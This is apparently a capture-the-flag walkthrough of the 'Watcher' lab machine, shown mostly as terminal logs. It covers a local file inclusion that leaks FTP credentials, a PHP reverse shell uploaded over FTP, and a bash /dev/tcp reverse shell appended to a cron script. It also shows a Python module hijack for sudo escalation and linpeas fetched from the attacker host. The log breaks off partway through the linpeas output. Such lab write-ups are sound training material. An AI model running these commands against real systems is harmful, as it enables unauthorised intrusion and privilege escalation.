Watcher

A boot2root Linux machine utilising web exploits along with some common privilege escalation techniques.

Watcher

Start Machine

Work your way through the machine and try to find all the flags you can!

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.202.105 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.202.105:22
Open 10.10.202.105:21
Open 10.10.202.105:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 14:01 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:01
Completed Parallel DNS resolution of 1 host. at 14:01, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 14:01
Scanning 10.10.202.105 [3 ports]
Discovered open port 80/tcp on 10.10.202.105
Discovered open port 21/tcp on 10.10.202.105
Discovered open port 22/tcp on 10.10.202.105
Completed Connect Scan at 14:01, 0.24s elapsed (3 total ports)
Initiating Service scan at 14:01
Scanning 3 services on 10.10.202.105
Completed Service scan at 14:01, 7.00s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.202.105.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 12.47s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 1.75s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Nmap scan report for 10.10.202.105
Host is up, received user-set (0.24s latency).
Scanned at 2023-03-15 14:01:37 EDT for 21s

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e180ec1f269e32eb273f26acd237ba96 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7hN8ixZsMzRUvaZjiBUrqtngTVOcdko2FRpRMT0D/LTRm8x8SvtI5a52C/adoiNNreQO5/DOW8k5uxY1Rtx/HGvci9fdbplPz7RLtt+Mc9pgGHj0ZEm/X0AfhBF0P3Uwf3paiqCqeDcG1HHVceFUKpDt0YcBeiG1JJ5LZpRxqAyd0jOJsC1FBNBPZAtUA11KOEvxbg5j6pEL1rmbjwGKUVxM8HIgSuU6R6anZxTrpUPvcho9W5F3+JSxl/E+vF9f51HtIQcXaldiTNhfwLsklPcunDw7Yo9IqhqlORDrM7biQOtUnanwGZLFX7kfQL28r9HbEwpAHxdScXDFmu5wR
|   256 36ff7011058ed4507a29915875ac2e76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBmjWU4CISIz0mdwq6ObddQ3+hBuOm49wam2XHUdUaJkZHf4tOqzl+HVz107toZIXKn1ui58hl9+6ojTnJ6jN/Y=
|   256 48d23e45da0cf0f6654ef9789737aa8a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHb7zsrJYdPY9eb0sx8CvMphZyxajGuvbDShGXOV9MDX
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
|_http-generator: Jekyll v4.1.1
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds

http://10.10.202.105/robots.txt

User-agent: *
Allow: /flag_1.txt
Allow: /secret_file_do_not_read.txt

view-source:http://10.10.202.105/flag_1.txt

FLAG{robots_dot_text_what_is_next}

view-source:http://10.10.202.105/secret_file_do_not_read.txt

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.10.202.105 Port 80</address>
</body></html>

http://10.10.202.105/post.php?post=secret_file_do_not_read.txt

Hi Mat, The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files. Will ---------- ftpuser:givemefiles777 

┌──(witty㉿kali)-[~/Downloads]
└─$ ftp 10.10.202.105
Connected to 10.10.202.105.
220 (vsFTPd 3.0.3)
Name (10.10.202.105:witty): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -l
229 Entering Extended Passive Mode (|||42209|)
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Dec 03  2020 files
-rw-r--r--    1 0        0              21 Dec 03  2020 flag_2.txt
226 Directory send OK.
ftp> more flag_2.txt
FLAG{ftp_you_and_me}

ftp> cd files
250 Directory successfully changed.
ftp> ls -lah
229 Entering Extended Passive Mode (|||45852|)
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Dec 03  2020 .
dr-xr-xr-x    3 65534    65534        4096 Dec 03  2020 ..
226 Directory send OK.

ftp> put payload_ivan.php
local: payload_ivan.php remote: payload_ivan.php
229 Entering Extended Passive Mode (|||47626|)
150 Ok to send data.
100% |**************************************|  9284      792.65 KiB/s    00:00 ETA
226 Transfer complete.
9284 bytes sent in 00:00 (22.85 KiB/s)

http://10.10.202.105/post.php?post=/home/ftpuser/ftp/flag_2.txt

FLAG{ftp_you_and_me} 

http://10.10.202.105/post.php?post=/home/ftpuser/ftp/files/payload_ivan.php
┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1337                                      
listening on [any] 1337 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.202.105] 56022
SOCKET: Shell has connected! PID: 2136
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@watcher:/var/www/html$ 
www-data@watcher:/var/www/html$ export TERM=xterm
export TERM=xterm
www-data@watcher:/var/www/html$ 
zsh: suspended  rlwrap nc -lvnp 1337
                                                                                                                        
┌──(witty㉿kali)-[~/Downloads]
└─$ stty raw -echo; fg
[1]  + continued  rlwrap nc -lvnp 1337
www-data@watcher:/var/www/html$ 

www-data@watcher:/var/www/html$ ls
ls
bunch.php   images		 post.php    secret_file_do_not_read.txt
css	    index.php		 robots.txt  striped.php
flag_1.txt  more_secrets_a9f10a  round.php
www-data@watcher:/var/www/html$ cd more_secrets_a9f10a
cd more_secrets_a9f10a
www-data@watcher:/var/www/html/more_secrets_a9f10a$ ls
ls
flag_3.txt
www-data@watcher:/var/www/html/more_secrets_a9f10a$ cat flag_3.txt
cat flag_3.txt
FLAG{lfi_what_a_guy}

www-data@watcher:/var/www/html/more_secrets_a9f10a$ find / -type f -name "flag*" 2>/dev/null | xargs ls -lah
</ -type f -name "flag*" 2>/dev/null | xargs ls -lah
-rw-r--r-- 1 root root   21 Dec  3  2020 /home/ftpuser/ftp/flag_2.txt
-rw------- 1 mat  mat    37 Dec  3  2020 /home/mat/flag_5.txt
-rw------- 1 toby toby   21 Dec  3  2020 /home/toby/flag_4.txt
-rw------- 1 will will   41 Dec  3  2020 /home/will/flag_6.txt
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS1/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS10/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS11/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS12/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS13/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS14/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS15/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS16/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS17/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS18/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS19/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS2/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS20/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS21/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS22/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS23/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS24/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS25/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS26/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS27/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS28/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS29/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS3/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS30/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS31/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS4/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS5/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS6/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS7/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS8/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/platform/serial8250/tty/ttyS9/flags
-r--r----- 1 root root 4.0K Mar 15 18:42 /sys/devices/pnp0/00:06/tty/ttyS0/flags
-rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/vif-0/net/eth0/flags
-rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/virtual/net/lo/flags
-rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/virtual/net/lxdbr0/flags
-rw-r--r-- 1 root root 4.0K Mar 15 18:42 /sys/devices/virtual/net/vethH5SDE5/flags
-rw-r--r-- 1 root root    0 Nov 23  2020 /usr/src/linux-headers-4.15.0-126-generic/include/config/arch/uses/high/vma/flags.h
-rw-r--r-- 1 root root 1.6K Jan 28  2018 /usr/src/linux-headers-4.15.0-126/scripts/coccinelle/locks/flags.cocci
-rw-r--r-- 1 root root    0 Dec  9  2020 /usr/src/linux-headers-4.15.0-128-generic/include/config/arch/uses/high/vma/flags.h
-rw-r--r-- 1 root root 1.6K Jan 28  2018 /usr/src/linux-headers-4.15.0-128/scripts/coccinelle/locks/flags.cocci
-rw-r--r-- 1 root root   35 Dec  3  2020 /var/www/html/flag_1.txt
-rw-r--r-- 1 root root   21 Dec  3  2020 /var/www/html/more_secrets_a9f10a/flag_3.txt

www-data@watcher:/home/toby$ sudo -u toby cat flag_4.txt
sudo -u toby cat flag_4.txt
FLAG{chad_lifestyle}

www-data@watcher:/home/toby$ cat note.txt
cat note.txt
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

Mat

www-data@watcher:/home/toby$ cd jobs
cd jobs
www-data@watcher:/home/toby/jobs$ ls
ls
cow.sh
www-data@watcher:/home/toby/jobs$ cat cow.sh
cat cow.sh
#!/bin/bash
cp /home/mat/cow.jpg /tmp/cow.jpg

www-data@watcher:/home/toby/jobs$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/1 * * * * mat /home/toby/jobs/cow.sh

www-data@watcher:/home/toby/jobs$ sudo -u toby /bin/bash
sudo -u toby /bin/bash

toby@watcher:~/jobs$ echo "/bin/bash -i >& /dev/tcp/10.8.19.103/1338 0>&1" >> cow.sh
<ash -i >& /dev/tcp/10.8.19.103/1338 0>&1" >> cow.sh
toby@watcher:~/jobs$ cat cow.sh
cat cow.sh
#!/bin/bash
cp /home/mat/cow.jpg /tmp/cow.jpg
/bin/bash -i >& /dev/tcp/10.8.19.103/1338 0>&1

┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.46.15] 34684
bash: cannot set terminal process group (2175): Inappropriate ioctl for device
bash: no job control in this shell
mat@watcher:~$ cd /home/mat
cd /home/mat
mat@watcher:~$ ls
ls
cow.jpg
flag_5.txt
note.txt
scripts
mat@watcher:~$ cat flag_5.txt
cat flag_5.txt
FLAG{live_by_the_cow_die_by_the_cow}
mat@watcher:~$ cat note.txt
cat note.txt
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will

mat@watcher:~$ sudo -l
sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *
mat@watcher:~$ cd scripts
cd scripts
mat@watcher:~/scripts$ ls -lah
ls -lah
total 16K
drwxrwxr-x 2 will will 4.0K Dec  3  2020 .
drwxr-xr-x 6 mat  mat  4.0K Dec  3  2020 ..
-rw-r--r-- 1 mat  mat   133 Dec  3  2020 cmd.py
-rw-r--r-- 1 will will  208 Dec  3  2020 will_script.py

mat@watcher:~/scripts$ cat will_script.py
cat will_script.py
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
	print("Invalid command!")
	exit()

os.system(cmd)

mat@watcher:~/scripts$ cat cmd.py
cat cmd.py
def get_command(num):
	if(num == "1"):
		return "ls -lah"
	if(num == "2"):
		return "id"
	if(num == "3"):
		return "cat /etc/passwd"

mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
</usr/bin/python3 /home/mat/scripts/will_script.py 1
total 20K
drwxrwxr-x 3 will will 4.0K Mar 15 21:59 .
drwxr-xr-x 6 mat  mat  4.0K Dec  3  2020 ..
-rw-r--r-- 1 mat  mat   133 Dec  3  2020 cmd.py
drwxr-xr-x 2 will will 4.0K Mar 15 21:59 __pycache__
-rw-r--r-- 1 will will  208 Dec  3  2020 will_script.py
mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 2
</usr/bin/python3 /home/mat/scripts/will_script.py 2
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)
mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 3
</usr/bin/python3 /home/mat/scripts/will_script.py 3
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
will:x:1000:1000:will:/home/will:/bin/bash
ftp:x:111:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
ftpuser:x:1001:1001:,,,:/home/ftpuser:/usr/sbin/nologin
mat:x:1002:1002:,#,,:/home/mat:/bin/bash
toby:x:1003:1003:,,,:/home/toby:/bin/bash

┌──(witty㉿kali)-[/tmp]
└─$ cat cmd.py         
import os
def get_command(num):
	if(num == "1"):
		os.system("/bin/bash")
		return "ls -lah"
	if(num == "2"):
		return "id"
	if(num == "3"):
		return "cat /etc/passwd"

mat@watcher:~/scripts$ cat << EOF > cmd.py
import os

def get_command(num):
    if num == "1":
        os.system("/bin/bash")
        return "ls -lah"
    elif num == "2":
        return "id"
    elif num == "3":
cat << EOF > cmd.py        return "cat /etc/passwd"
EOF

mat@watcher:~/scripts$ cat cmd.py
cat cmd.py
import os

def get_command(num):
    if num == "1":
        os.system("/bin/bash")
        return "ls -lah"
    elif num == "2":
        return "id"
    elif num == "3":
        return "cat /etc/passwd"

mat@watcher:~/scripts$ sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1
id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)
python3 -c 'import pty;pty.spawn("/bin/bash")'

will@watcher:~/scripts$ cd /home/will
cd /home/will
will@watcher:/home/will$ ls
ls
flag_6.txt
will@watcher:/home/will$ cat flag_6.txt
cat flag_6.txt
FLAG{but_i_thought_my_script_was_secure}

let's upload linpeas.sh

┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.46.15 - - [15/Mar/2023 18:12:20] "GET /linpeas.sh HTTP/1.1" 200 -

will@watcher:/home/will$ cd /tmp
cd /tmp
will@watcher:/tmp$ ls
ls
cow.jpg
systemd-private-4299b256f4914c5dabb6efdd98cbfad1-apache2.service-RcvrZa
systemd-private-4299b256f4914c5dabb6efdd98cbfad1-systemd-resolved.service-QXKnlS
systemd-private-4299b256f4914c5dabb6efdd98cbfad1-systemd-timesyncd.service-SXkG61
will@watcher:/tmp$ wget http://10.8.19.103:1234/linpeas.sh
wget http://10.8.19.103:1234/linpeas.sh
--2023-03-15 22:12:20--  http://10.8.19.103:1234/linpeas.sh
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 808.69K   402KB/s    in 2.0s    

2023-03-15 22:12:23 (402 KB/s) - ‘linpeas.sh’ saved [828098/828098]

will@watcher:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
will@watcher:/tmp$ ./linpeas.sh

./linpeas.sh


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------| 
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @carlospolopm                           |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 4.15.0-128-generic (buildd@lcy01-amd64-025) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020
User & Groups: uid=1000(will) gid=1000(will) groups=1000(will),4(adm)
Hostname: watcher
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)



Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe
DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.15.0-128-generic (buildd@lcy01-amd64-025) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.5 LTS
Release:	18.04
Codename:	bionic

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.21p2

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

Potentially Vulnerable to CVE-2022-2588



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

╔══════════╣ Date & uptime
Wed 15 Mar 22:18:44 UTC 2023
 22:18:44 up 59 min,  0 users,  load average: 3.02, 2.23, 1.51

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-JDiX8mONRtORjihtAeB1NKbW4At1spD6uvcJcoIeLZvX833HMx9Ow9sxIsGsUsQe/	ext4	defaults	0 0
/dev/disk/by-uuid/e2eadcec-b293-4dba-b0a6-ec2a71093ce7	/boot	ext4	defaults	0 0

╔══════════╣ Environment
╚ Any private information inside environment variables?
SUDO_GID=1002
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
MAIL=/var/mail/will
USER=will
SHLVL=4
HOME=/home/mat
OLDPWD=/home/will
SUDO_UID=1002
LOGNAME=will
_=./linpeas.sh
USERNAME=will
TERM=unknown
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
LANG=en_GB.UTF-8
HISTSIZE=0
LS_COLORS=
SUDO_COMMAND=/usr/bin/python3 /home/mat/scripts/will_script.py 1
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
SUDO_USER=mat
PWD=/tmp
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
